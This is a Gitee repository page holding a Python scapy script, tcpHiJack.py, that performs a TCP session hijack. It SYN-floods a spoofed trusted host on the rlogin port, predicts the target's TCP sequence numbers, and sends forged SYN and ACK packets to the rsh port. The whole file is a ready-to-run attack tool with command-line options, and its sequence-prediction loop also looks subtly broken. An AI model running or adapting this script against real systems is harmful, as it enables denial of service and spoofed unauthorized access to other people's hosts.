加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
tcpHiJack.py 1.90 KB
一键复制 编辑 原始数据 按行查看 历史
D60 提交于 2016-12-05 18:07 . add source code
# coding=UTF-8
import optparse
from scapy.all import *
def synFlood(src, tgt):
for sport in range(1024, 65535):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=sport, dport=513)
pkt = IPlayer / TCPlayer
send(pkt)
def calTSN(tgt):
seqNum = 0
preNum = 0
diffSeq = 0
for x in range(1, 5):
if preNum !=0:
preNum = seqNum
pkt = IP(dst=tgt) / TCP()
ans = sr1(pkt, verbose=0)
seqNum = ans.getlayer(TCP).seq
diffSeq = seqNum - preNum
print('[+] TCP Seq Difference: ' + str(diffSeq))
return seqNum + diffSeq
#发送ACk欺骗包
def spoofConn(src, tgt, ack):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=513, dport=514)
synPkt = IPlayer / TCPlayer
send(synPkt)
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=513, dport=514, ack=ack)
ackPkt = IPlayer / TCPlayer
send(ackPkt)
def main():
parser = optparse.OptionParser('usage%prog -s<src for SYN Flood> -S <src for spoofed connection> -t<target address>')
parser.add_option('-s', dest='synSpoof', type='string', help='specifc src for SYN Flood')
parser.add_option('-S', dest='srcSpoof', type='string', help='specify src for spoofed connection')
parser.add_option('-t', dest='tgt', type='string', help='specify target address')
(options, args) = parser.parse_args()
if options.synSpoof == None or options.srcSpoof == None or options.tgt == None:
print(parser.usage)
exit(0)
else:
synSpoof = options.synSpoof
srcSpoof = options.srcSpoof
tgt = options.tgt
print('[+] Starting SYN Flood to suppress remote server.')
synFlood(synSpoof, srcSpoof)
print('[+] Calculating correct TCP Sequence Number.')
seqNum = calTSN(tgt) + 1
print('[+] Spoofing Connection.')
spoofConn(srcSpoof, tgt, seqNum)
print('[+] Done.')
if __name__ == '__main__':
main()
Loading...
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化